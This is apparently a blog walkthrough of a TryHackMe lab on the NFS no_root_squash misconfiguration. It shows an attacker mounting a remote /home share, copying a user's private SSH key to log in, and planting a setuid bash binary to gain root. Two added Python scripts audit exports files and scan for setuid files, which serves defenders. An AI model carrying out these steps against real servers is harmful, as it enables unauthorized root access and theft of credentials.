Network File System (NFS) is a file-sharing protocol used to allow computers on a network to access and share files over a network. It allows multiple users to access the same files on a remote system as if they were local files on their own computers. NFS is an important part of many enterprise networks, allowing for easy collaboration and file sharing.
NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac).
In this practice box from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final
WHAT IS NO-ROOT SQUASH?
No-root Squash is an uncommon configuration (some might say a misconfiguration) on the NFS file system. When it is enabled, a user who is root on the NFS client keeps root’s privileges on the exported share: they can change the ownership and permissions of any file there and set the SETUID bit on a binary, which then runs as the root user of the server. Normally it is disabled to protect against hackers, and files created by a remote root user are instead assigned to an unprivileged owner.
👉 Recommended: If you are interested in learning more technical details about how this works, I’d recommend this article on no_root_squash and other configuration options when using NFS.
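To make the option concrete from the defender’s side, here is an added example (not part of the original post or of TryHackMe’s material) that parses an exports(5)-style file and reports every client that is granted no_root_squash, together with the hardened replacement line. The SAMPLE_EXPORTS text is constructed for the example and the function names are my own.

```python
"""Audit an exports(5) file for clients that keep remote root as uid 0.

Added example, not from the original post. The sample exports text is
constructed; function names are the example author's own.
"""
import re

# Constructed sample: a safe line, the misconfiguration on a world export,
# a per-client mix, and a line relying on the root_squash default.
SAMPLE_EXPORTS = """
# /etc/exports (constructed sample)
/srv/share   10.0.0.0/24(rw,sync,root_squash)
/home        *(rw,sync,no_subtree_check,no_root_squash)
/data        192.168.1.5(ro) 192.168.1.6(rw,no_root_squash,insecure)
/backup      *(rw,sync)
"""

# A client spec is "<host-or-network>(opt,opt)"; the option list is optional.
SPEC_RE = re.compile(r"^([^(\s]+)(?:\((.*)\))?$")


def _split_opts(opts):
    return [o.strip() for o in (opts or "").split(",") if o.strip()]


def parse_exports(text):
    """Return a list of (path, client, options) tuples, one per client."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:] or ["*"]  # bare path: exported to all
        for spec in specs:
            if spec.startswith("("):
                # A space before the option list is a classic slip: the
                # options then apply to every host, not to the preceding client.
                entries.append((path, "*", _split_opts(spec[1:-1])))
                continue
            m = SPEC_RE.match(spec)
            if m:
                entries.append((path, m.group(1), _split_opts(m.group(2))))
    return entries


def find_no_root_squash(entries):
    """Findings for clients where a remote uid 0 is not remapped.

    root_squash is the exportfs default, so only an explicit no_root_squash
    is a finding. Aggravating factors (world export, writable, insecure
    ports) are attached as notes for triage.
    """
    findings = []
    for path, client, opts in entries:
        if "no_root_squash" not in opts:
            continue
        notes = []
        if client.startswith("*"):
            notes.append("exported to any host")
        if "rw" in opts:
            notes.append("writable")
        if "insecure" in opts:
            notes.append("insecure: unprivileged source ports accepted")
        findings.append({"path": path, "client": client, "notes": notes})
    return findings


def hardened_line(path, client, opts):
    """Rewrite one client's options so that remote root is squashed."""
    fixed = [o for o in opts if o != "no_root_squash"]
    if "root_squash" not in fixed:
        fixed.append("root_squash")
    return f"{path} {client}({','.join(fixed)})"


if __name__ == "__main__":
    parsed = parse_exports(SAMPLE_EXPORTS)
    for f in find_no_root_squash(parsed):
        print(f"{f['path']} -> {f['client']}: no_root_squash ({', '.join(f['notes'])})")
    for path, client, opts in parsed:
        if "no_root_squash" in opts:
            print("fix:", hardened_line(path, client, opts))
```

Run against a real /etc/exports by passing its contents to parse_exports; after editing the file, remember that the change only takes effect once exportfs re-reads it.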
We’ll start with a standard Nmap scan of all ports with the command:
nmap $targetIP -p-
(-p- scans all 65535 TCP ports rather than Nmap’s default top 1000)
The scan shows an nfs service running on the target. Let’s find out what directories are mountable with the command:
showmount -e $targetIP
(-e lists the server’s exports)
Let’s go ahead and mount the target’s /home directory on our attack machine. I’m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the nfs directory directly to our local filesystem with the command:
mount -t nfs $targetIP:/home /mount
(-t specifies the filesystem type; the mount point /mount has to exist, so create it first if it doesn’t)
And now we can continue further enumeration by poking around the filesystem.
cd /mount
ls -la
We find a user folder in the home directory, cappuccino, and a hidden directory .ssh. Inside that directory there is an id_rsa file that holds a private ssh key.
INITIAL FOOTHOLD – USER CAPPUCCINO
After copying the id_rsa file over to our attack machine, we can ssh into cappuccino’s account with this command:
ssh -i id_rsa cappuccino@$targetIP
(ssh refuses a private key that other users can read, so run chmod 600 id_rsa first if needed)
ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS
Now that we have our initial foothold, we can grab a copy of the well-known script linpeas.sh from the official git repo and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the /mount folder and use the wget command on our attack machine for this:
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Before running the script on the target machine, we need to add execute permissions to the file from our attack machine. The beauty of mounting NFS file systems in Linux is evident here: we can simply chmod linpeas.sh on our attack machine and it becomes executable on the target machine as well, because both sides see the same files.
chmod +x linpeas.sh
Now that linpeas.sh is in the /home folder of the target machine, we can run it from our ssh session to start the automated enumeration:
This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text.
Scrolling through the results, we quickly find no_root_squash listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.
First, let’s grab the bash executable for Ubuntu Server 18.04 from the link on TryHackMe.
sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
(Note that a github.com/…/blob/… address returns the HTML page for the file rather than the file itself; use that page’s Raw link, which is served from raw.githubusercontent.com, to download the actual binary.)
Now we add the SETUID bit to the bash file and make it executable. This is the key step in gaining root access.
sudo chmod +sx bash
Running bash now from our target machine doesn’t seem to change us to the root user yet. The final trick is to start bash in privileged mode with the -p flag: without it, bash notices that its effective uid differs from the real uid and drops the privileges the SETUID bit gave it.
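What this leaves behind on the server is a setuid file owned by root inside an exported directory, which is exactly what a defender should be looking for. The following added example (mine, not from the original post) walks a directory tree without following symlinks and lists setuid/setgid regular files, separating out the root-owned ones; demo() builds a constructed tree in a temporary directory to run the scan against, so the paths and file names in it are made up.

```python
"""Find setuid/setgid executables under a directory tree.

Added example, not from the original post: a server-side check to run
over an exported directory such as /home to catch a setuid binary planted
by a client that was allowed to act as root. demo() builds a constructed
sample tree in a temporary directory.
"""
import os
import shutil
import stat
import tempfile


def scan_setuid(root):
    """Walk `root` without following symlinks; return (path, uid, mode, kind).

    kind is 'setuid', 'setgid' or 'setuid+setgid'. Files owned by uid 0 are
    the ones that matter most: they execute with the server's root identity.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            is_suid = bool(st.st_mode & stat.S_ISUID)
            is_sgid = bool(st.st_mode & stat.S_ISGID)
            if not (is_suid or is_sgid):
                continue
            kind = "+".join(k for k, on in (("setuid", is_suid), ("setgid", is_sgid)) if on)
            findings.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode)), kind))
    return findings


def root_owned(findings):
    """Subset of findings that would run as uid 0: owner root with setuid set."""
    return [f for f in findings if f[1] == 0 and "setuid" in f[3]]


def demo():
    """Build a constructed tree (one plain script, one setuid copy), scan it,
    clean up, and return the findings with paths relative to the tree."""
    base = tempfile.mkdtemp(prefix="nfs-audit-")
    try:
        home = os.path.join(base, "cappuccino")
        os.makedirs(home)
        plain = os.path.join(home, "notes.sh")
        planted = os.path.join(home, "bash")
        for p in (plain, planted):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\necho hi\n")
        os.chmod(plain, 0o755)
        # Same effect on the inode as the walkthrough's `chmod +sx bash`.
        os.chmod(planted, 0o755 | stat.S_ISUID | stat.S_ISGID)
        return [(os.path.relpath(p, base), uid, mode, kind)
                for p, uid, mode, kind in scan_setuid(base)]
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for path, uid, mode, kind in demo():
        print(f"{mode} uid={uid} {kind}: {path}")
```

On a real server, call scan_setuid on each exported path and alert on root_owned results; exporting with root_squash (and, where clients never need setuid binaries, mounting the export nosuid on the client side) removes the condition that lets such a file be created in the first place.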
If you liked this tutorial, you’d probably love my video walkthrough as well:
👉 Recommended Tutorial: Alice in Wonderland — TryHackMe
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.